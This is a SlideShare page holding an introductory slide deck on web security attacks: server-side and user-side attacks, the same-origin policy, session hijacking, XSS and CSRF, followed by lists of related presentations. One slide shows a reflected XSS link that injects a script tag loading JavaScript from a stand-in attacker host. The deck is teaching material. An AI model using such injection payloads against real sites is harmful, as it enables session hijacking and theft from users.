SlideShare a Scribd company logo

Web Security Attacks

Download as PPTX, PDF
S
Sajid Hasan

Web application security is the process of securing confidential data stored online from unauthorized access and modification. This is accomplished by enforcing stringent policy measures. A web threat is any threat that uses the World Wide Web to facilitate cybercrime. Web threats use multiple types of malware and fraud, all of which utilize HTTP or HTTPS protocols, but may also employ other protocols and components, such as links in email or IM, or malware attachments or on servers that access the Web.

Engineering
1 of 18
Web Security Attacks
Web Security Principal: ● Branch of Computer security specifically related to Internet ● It deals with online threats ● Basically, it consists in two major areas: ● Web Application Security ● Web Browser Security
Goals: ● Web applications should guarantee the same security as the one required for standalone applications ● Web browsers should protect users in a way to avoid computer infections and sensitive data compromise Web Security
Web Security Motivation : ● Most web sites have vulnerabilities ● Many users are not security minded ● Several components could be targeted ● Since many layers can be attacked, game over is often feasible
Attacking The Server Typically, hackers can exploit injection flaws and other web application vulnerabilities: ● SQL Injection ● Command execution ● Local file access ● XML External Entities ● Web server exploits and misconfiguration ● Exposed administrative panels
Attacking The Server Involved components: ● Web applications ● Web servers ● Web services ● Databases
Attacking the users Typically, hackers can exploit web application vulnerabilities to attack users: ● Cross-Site Scripting ● Cross-Site Request Forgery ● UI Redressing ● Arbitrary URL redirects
Attacking the users Possible goals: ● Impersonate users ● Privilege escalation ● Make victims trigger unwanted operations ● Credentials stealing via phishing
Origin Policy Security principle that regulates web browser security: ● It restricts how a document loaded from A.com can interact with another document hosted on B.com ● A.com and B.com are considered as different origins, therefore they are isolated
Origin Policy Example: ● The user is logged in sensi.tive.webm.ail.com ● The attacker may ask him to visit evil.com aiming towards stealing his session cookies for sensi.tive.webm.ail.com ● SOP prohibits such attempt resulting in a security exception
Moving to web attacks ● HTTP requests containing malicious payloads could attack web applications ● Vulnerable web applications have weaknesses, whose exploitation could potentially lead to unexpected results ● Unpatched clients are potentially affected by several vulnerabilities Attack:
Moving to web attacks ● Vulnerability detection is not trivial, at least for “uncommon” bugs ● Penetration testing is surely useful for spotting vulnerabilities, but it does guarantee completeness ● Protecting users requires several layers of protection both on the client and on the server side Defense:
Session Hijacking This can take place through several ways: ● Predictable session tokens ● Cross-Site Scripting vulnerabilities ● Mixed content issues ● Session Fixation ● SOP bypass exploits ● Victim's computer malware infection
Cross-Site Scripting ● Malicious HTML and/or JavaScript code is injected in the context of a target domain ● Since the browser have no way to distinguish whether a script is legit or not, it will execute it ● According to the SOP, the injected code will be executed in the context of the trusted web site
Cross-Site Scripting Generally, Cross-Site Scripting (XSS) attacks are categorized in three categories: ● Reflected XSS ● Stored XSS ● DOM-Based XSS
Reflected XSS • The attacker sends a specifically crafted link to the victim and asks him to visit it ● http://target/index.php?name=<script src=//ev.il.co.m/mal.js></script> • The victim clicks the malicious link pointing to http://target • The PHP page index.php echoes back the injected parameter • The script hosted on ev.il.co.m/mal.js is executed Exploitation Flow:
Cross-Site Request Forgery ● Attack in which the victim is forced into making unwanted operations with respect to a web application, he is authenticated with ● The target of CSRF attacks are state-changing functionality ● The attack is feasible since the browser automatically appends cookies in HTTP • requests, also in the ones taking place cross-domain
Thank You For Stay With Us

Recommended

Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
TzahiArabov
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Netsparker
 
Basics of Server Side Template Injection
Basics of Server Side Template InjectionBasics of Server Side Template Injection
Basics of Server Side Template Injection
Vandana Verma
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
Gaurav Sharma
 

Recommended

Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
TzahiArabov
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Netsparker
 
Basics of Server Side Template Injection
Basics of Server Side Template InjectionBasics of Server Side Template Injection
Basics of Server Side Template Injection
Vandana Verma
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
Gaurav Sharma
 
Penetration Testing
Penetration Testing Penetration Testing
Penetration Testing
RomSoft SRL
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
Information Technology
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
KHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack PreventionKHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack Prevention
APNIC
 
Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)
Abhinav Mishra
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin Bisht
Nitin Bisht
 
Broken access control
Broken access controlBroken access control
Broken access control
Priyanshu Gandhi
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
Amit Dubey
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
Sanjay Kumar
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
Hacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdfHacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdf
Matt Tesauro
 
Malware classification and detection
Malware classification and detectionMalware classification and detection
Malware classification and detection
Chong-Kuan Chen
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
n|u - The Open Security Community
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
Abu Sadat Mohammed Yasin
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
Vivek Sinha Anurag
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
yashwanthlavu
 
Web application security
Web application securityWeb application security
Web application security
Akhil Raj
 

More Related Content

What's hot

Penetration Testing
Penetration Testing Penetration Testing
Penetration Testing
RomSoft SRL
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
Information Technology
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
KHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack PreventionKHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack Prevention
APNIC
 
Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)
Abhinav Mishra
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin Bisht
Nitin Bisht
 
Broken access control
Broken access controlBroken access control
Broken access control
Priyanshu Gandhi
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
Amit Dubey
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
Sanjay Kumar
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
Hacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdfHacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdf
Matt Tesauro
 
Malware classification and detection
Malware classification and detectionMalware classification and detection
Malware classification and detection
Chong-Kuan Chen
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
n|u - The Open Security Community
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
Abu Sadat Mohammed Yasin
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
Vivek Sinha Anurag
 

What's hot (20)

Penetration Testing
Penetration Testing Penetration Testing
Penetration Testing
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
KHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack PreventionKHNOG 3: DDoS Attack Prevention
KHNOG 3: DDoS Attack Prevention
 
Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin Bisht
 
Broken access control
Broken access controlBroken access control
Broken access control
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Hacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdfHacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdf
 
Malware classification and detection
Malware classification and detectionMalware classification and detection
Malware classification and detection
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 

Similar to Web Security Attacks

WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
yashwanthlavu
 
Web application security
Web application securityWeb application security
Web application security
Akhil Raj
 
Chapter 3 Presentation
Chapter 3 PresentationChapter 3 Presentation
Chapter 3 Presentation
Amy McMullin
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
yashwanthlavu
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Internet Security
Internet SecurityInternet Security
Internet Security
Mitesh Gupta
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
Chap 03.ppt
Chap 03.pptChap 03.ppt
Chap 03.ppt
Razith2
 
Uniface Web Application Security
Uniface Web Application SecurityUniface Web Application Security
Uniface Web Application Security
Uniface
 
ISM Chapter 3 Application and Network Attacks.ppt
ISM Chapter 3 Application and Network Attacks.pptISM Chapter 3 Application and Network Attacks.ppt
ISM Chapter 3 Application and Network Attacks.ppt
SajjadAbdullah4
 
Welcome to International Journal of Engineering Research and Development (IJERD)
Welcome to International Journal of Engineering Research and Development (IJERD)Welcome to International Journal of Engineering Research and Development (IJERD)
Welcome to International Journal of Engineering Research and Development (IJERD)
IJERD Editor
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
Bilal Mazhar MS(IS)Cyber Security II Privacy Professional
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
Nitish Kumar
 
Engineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacyEngineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacy
software-engineering-book
 
Security presentation
Security presentationSecurity presentation
Security presentation
Bjørn Schaadt
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
Zakaria SMAHI
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
Victor Bucutea
 
Security .NET.pdf
Security .NET.pdfSecurity .NET.pdf
Security .NET.pdf
Abhi Jain
 

Similar to Web Security Attacks (20)

WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
 
Web application security
Web application securityWeb application security
Web application security
 
Chapter 3 Presentation
Chapter 3 PresentationChapter 3 Presentation
Chapter 3 Presentation
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Chap 03.ppt
Chap 03.pptChap 03.ppt
Chap 03.ppt
 
Uniface Web Application Security
Uniface Web Application SecurityUniface Web Application Security
Uniface Web Application Security
 
ISM Chapter 3 Application and Network Attacks.ppt
ISM Chapter 3 Application and Network Attacks.pptISM Chapter 3 Application and Network Attacks.ppt
ISM Chapter 3 Application and Network Attacks.ppt
 
Welcome to International Journal of Engineering Research and Development (IJERD)
Welcome to International Journal of Engineering Research and Development (IJERD)Welcome to International Journal of Engineering Research and Development (IJERD)
Welcome to International Journal of Engineering Research and Development (IJERD)
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
 
Engineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacyEngineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacy
 
Security presentation
Security presentationSecurity presentation
Security presentation
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Security .NET.pdf
Security .NET.pdfSecurity .NET.pdf
Security .NET.pdf
 

More from Sajid Hasan

Digital differential analyzer
Digital differential analyzerDigital differential analyzer
Digital differential analyzer
Sajid Hasan
 
Rgb and Cmy color model
Rgb and Cmy color modelRgb and Cmy color model
Rgb and Cmy color model
Sajid Hasan
 
Line coding
Line codingLine coding
Line coding
Sajid Hasan
 
Plasmid
PlasmidPlasmid
Plasmid
Sajid Hasan
 
Lcs & fractional knapsack
Lcs & fractional knapsackLcs & fractional knapsack
Lcs & fractional knapsack
Sajid Hasan
 
Bar chart, pie chart, histogram
Bar chart, pie chart, histogramBar chart, pie chart, histogram
Bar chart, pie chart, histogram
Sajid Hasan
 
Semiconductor
SemiconductorSemiconductor
Semiconductor
Sajid Hasan
 
Rangpur as a division in Bangladesh
Rangpur as a division in BangladeshRangpur as a division in Bangladesh
Rangpur as a division in Bangladesh
Sajid Hasan
 
Basic array in c programming
Basic array in c programmingBasic array in c programming
Basic array in c programming
Sajid Hasan
 
Cyber security
Cyber securityCyber security
Cyber security
Sajid Hasan
 
Cyber security
Cyber securityCyber security
Cyber security
Sajid Hasan
 
Cyber security
Cyber securityCyber security
Cyber security
Sajid Hasan
 

More from Sajid Hasan (12)

Digital differential analyzer
Digital differential analyzerDigital differential analyzer
Digital differential analyzer
 
Rgb and Cmy color model
Rgb and Cmy color modelRgb and Cmy color model
Rgb and Cmy color model
 
Line coding
Line codingLine coding
Line coding
 
Plasmid
PlasmidPlasmid
Plasmid
 
Lcs & fractional knapsack
Lcs & fractional knapsackLcs & fractional knapsack
Lcs & fractional knapsack
 
Bar chart, pie chart, histogram
Bar chart, pie chart, histogramBar chart, pie chart, histogram
Bar chart, pie chart, histogram
 
Semiconductor
SemiconductorSemiconductor
Semiconductor
 
Rangpur as a division in Bangladesh
Rangpur as a division in BangladeshRangpur as a division in Bangladesh
Rangpur as a division in Bangladesh
 
Basic array in c programming
Basic array in c programmingBasic array in c programming
Basic array in c programming
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber security
Cyber securityCyber security
Cyber security
 

Recently uploaded

Certificates - Mahmoud Mohamed Moursi Ahmed
Certificates - Mahmoud Mohamed Moursi AhmedCertificates - Mahmoud Mohamed Moursi Ahmed
Certificates - Mahmoud Mohamed Moursi Ahmed
Mahmoud Morsy
 
spirit beverages ppt without graphics.pptx
spirit beverages ppt without graphics.pptxspirit beverages ppt without graphics.pptx
spirit beverages ppt without graphics.pptx
Madan Karki
 
Embedded machine learning-based road conditions and driving behavior monitoring
Embedded machine learning-based road conditions and driving behavior monitoringEmbedded machine learning-based road conditions and driving behavior monitoring
Embedded machine learning-based road conditions and driving behavior monitoring
IJECEIAES
 
Literature Review Basics and Understanding Reference Management.pptx
Literature Review Basics and Understanding Reference Management.pptxLiterature Review Basics and Understanding Reference Management.pptx
Literature Review Basics and Understanding Reference Management.pptx
Dr Ramhari Poudyal
 
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
Yasser Mahgoub
 
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
IJECEIAES
 
The Python for beginners. This is an advance computer language.
The Python for beginners. This is an advance computer language.The Python for beginners. This is an advance computer language.
The Python for beginners. This is an advance computer language.
sachin chaurasia
 
Transformers design and coooling methods
Transformers design and coooling methodsTransformers design and coooling methods
Transformers design and coooling methods
Roger Rozario
 
Harnessing WebAssembly for Real-time Stateless Streaming Pipelines
Harnessing WebAssembly for Real-time Stateless Streaming PipelinesHarnessing WebAssembly for Real-time Stateless Streaming Pipelines
Harnessing WebAssembly for Real-time Stateless Streaming Pipelines
Christina Lin
 
UNLOCKING HEALTHCARE 4.0: NAVIGATING CRITICAL SUCCESS FACTORS FOR EFFECTIVE I...
UNLOCKING HEALTHCARE 4.0: NAVIGATING CRITICAL SUCCESS FACTORS FOR EFFECTIVE I...UNLOCKING HEALTHCARE 4.0: NAVIGATING CRITICAL SUCCESS FACTORS FOR EFFECTIVE I...
UNLOCKING HEALTHCARE 4.0: NAVIGATING CRITICAL SUCCESS FACTORS FOR EFFECTIVE I...
amsjournal
 
官方认证美国密歇根州立大学毕业证学位证书原版一模一样
官方认证美国密歇根州立大学毕业证学位证书原版一模一样官方认证美国密歇根州立大学毕业证学位证书原版一模一样
官方认证美国密歇根州立大学毕业证学位证书原版一模一样
171ticu
 
Engine Lubrication performance System.pdf
Engine Lubrication performance System.pdfEngine Lubrication performance System.pdf
Engine Lubrication performance System.pdf
mamamaam477
 
ACEP Magazine edition 4th launched on 05.06.2024
ACEP Magazine edition 4th launched on 05.06.2024ACEP Magazine edition 4th launched on 05.06.2024
ACEP Magazine edition 4th launched on 05.06.2024
Rahul
 
International Conference on NLP, Artificial Intelligence, Machine Learning an...
International Conference on NLP, Artificial Intelligence, Machine Learning an...International Conference on NLP, Artificial Intelligence, Machine Learning an...
International Conference on NLP, Artificial Intelligence, Machine Learning an...
gerogepatton
 
Advanced control scheme of doubly fed induction generator for wind turbine us...
Advanced control scheme of doubly fed induction generator for wind turbine us...Advanced control scheme of doubly fed induction generator for wind turbine us...
Advanced control scheme of doubly fed induction generator for wind turbine us...
IJECEIAES
 
Generative AI leverages algorithms to create various forms of content
Generative AI leverages algorithms to create various forms of contentGenerative AI leverages algorithms to create various forms of content
Generative AI leverages algorithms to create various forms of content
Hitesh Mohapatra
 
Introduction to AI Safety (public presentation).pptx
Introduction to AI Safety (public presentation).pptxIntroduction to AI Safety (public presentation).pptx
Introduction to AI Safety (public presentation).pptx
MiscAnnoy1
 
Hematology Analyzer Machine - Complete Blood Count
Hematology Analyzer Machine - Complete Blood CountHematology Analyzer Machine - Complete Blood Count
Hematology Analyzer Machine - Complete Blood Count
shahdabdulbaset
 
22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt
KrishnaveniKrishnara1
 
Redefining brain tumor segmentation: a cutting-edge convolutional neural netw...
Redefining brain tumor segmentation: a cutting-edge convolutional neural netw...Redefining brain tumor segmentation: a cutting-edge convolutional neural netw...
Redefining brain tumor segmentation: a cutting-edge convolutional neural netw...
IJECEIAES
 

Recently uploaded (20)

Certificates - Mahmoud Mohamed Moursi Ahmed
Certificates - Mahmoud Mohamed Moursi AhmedCertificates - Mahmoud Mohamed Moursi Ahmed
Certificates - Mahmoud Mohamed Moursi Ahmed
 
spirit beverages ppt without graphics.pptx
spirit beverages ppt without graphics.pptxspirit beverages ppt without graphics.pptx
spirit beverages ppt without graphics.pptx
 
Embedded machine learning-based road conditions and driving behavior monitoring
Embedded machine learning-based road conditions and driving behavior monitoringEmbedded machine learning-based road conditions and driving behavior monitoring
Embedded machine learning-based road conditions and driving behavior monitoring
 
Literature Review Basics and Understanding Reference Management.pptx
Literature Review Basics and Understanding Reference Management.pptxLiterature Review Basics and Understanding Reference Management.pptx
Literature Review Basics and Understanding Reference Management.pptx
 
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
 
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
 
The Python for beginners. This is an advance computer language.
The Python for beginners. This is an advance computer language.The Python for beginners. This is an advance computer language.
The Python for beginners. This is an advance computer language.
 
Transformers design and coooling methods
Transformers design and coooling methodsTransformers design and coooling methods
Transformers design and coooling methods
 
Harnessing WebAssembly for Real-time Stateless Streaming Pipelines
Harnessing WebAssembly for Real-time Stateless Streaming PipelinesHarnessing WebAssembly for Real-time Stateless Streaming Pipelines
Harnessing WebAssembly for Real-time Stateless Streaming Pipelines
 
UNLOCKING HEALTHCARE 4.0: NAVIGATING CRITICAL SUCCESS FACTORS FOR EFFECTIVE I...
UNLOCKING HEALTHCARE 4.0: NAVIGATING CRITICAL SUCCESS FACTORS FOR EFFECTIVE I...UNLOCKING HEALTHCARE 4.0: NAVIGATING CRITICAL SUCCESS FACTORS FOR EFFECTIVE I...
UNLOCKING HEALTHCARE 4.0: NAVIGATING CRITICAL SUCCESS FACTORS FOR EFFECTIVE I...
 
官方认证美国密歇根州立大学毕业证学位证书原版一模一样
官方认证美国密歇根州立大学毕业证学位证书原版一模一样官方认证美国密歇根州立大学毕业证学位证书原版一模一样
官方认证美国密歇根州立大学毕业证学位证书原版一模一样
 
Engine Lubrication performance System.pdf
Engine Lubrication performance System.pdfEngine Lubrication performance System.pdf
Engine Lubrication performance System.pdf
 
ACEP Magazine edition 4th launched on 05.06.2024
ACEP Magazine edition 4th launched on 05.06.2024ACEP Magazine edition 4th launched on 05.06.2024
ACEP Magazine edition 4th launched on 05.06.2024
 
International Conference on NLP, Artificial Intelligence, Machine Learning an...
International Conference on NLP, Artificial Intelligence, Machine Learning an...International Conference on NLP, Artificial Intelligence, Machine Learning an...
International Conference on NLP, Artificial Intelligence, Machine Learning an...
 
Advanced control scheme of doubly fed induction generator for wind turbine us...
Advanced control scheme of doubly fed induction generator for wind turbine us...Advanced control scheme of doubly fed induction generator for wind turbine us...
Advanced control scheme of doubly fed induction generator for wind turbine us...
 
Generative AI leverages algorithms to create various forms of content
Generative AI leverages algorithms to create various forms of contentGenerative AI leverages algorithms to create various forms of content
Generative AI leverages algorithms to create various forms of content
 
Introduction to AI Safety (public presentation).pptx
Introduction to AI Safety (public presentation).pptxIntroduction to AI Safety (public presentation).pptx
Introduction to AI Safety (public presentation).pptx
 
Hematology Analyzer Machine - Complete Blood Count
Hematology Analyzer Machine - Complete Blood CountHematology Analyzer Machine - Complete Blood Count
Hematology Analyzer Machine - Complete Blood Count
 
22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt
 
Redefining brain tumor segmentation: a cutting-edge convolutional neural netw...
Redefining brain tumor segmentation: a cutting-edge convolutional neural netw...Redefining brain tumor segmentation: a cutting-edge convolutional neural netw...
Redefining brain tumor segmentation: a cutting-edge convolutional neural netw...
 

Web Security Attacks

  • 2. Web Security Principal: ● Branch of Computer security specifically related to Internet ● It deals with online threats ● Basically, it consists in two major areas: ● Web Application Security ● Web Browser Security
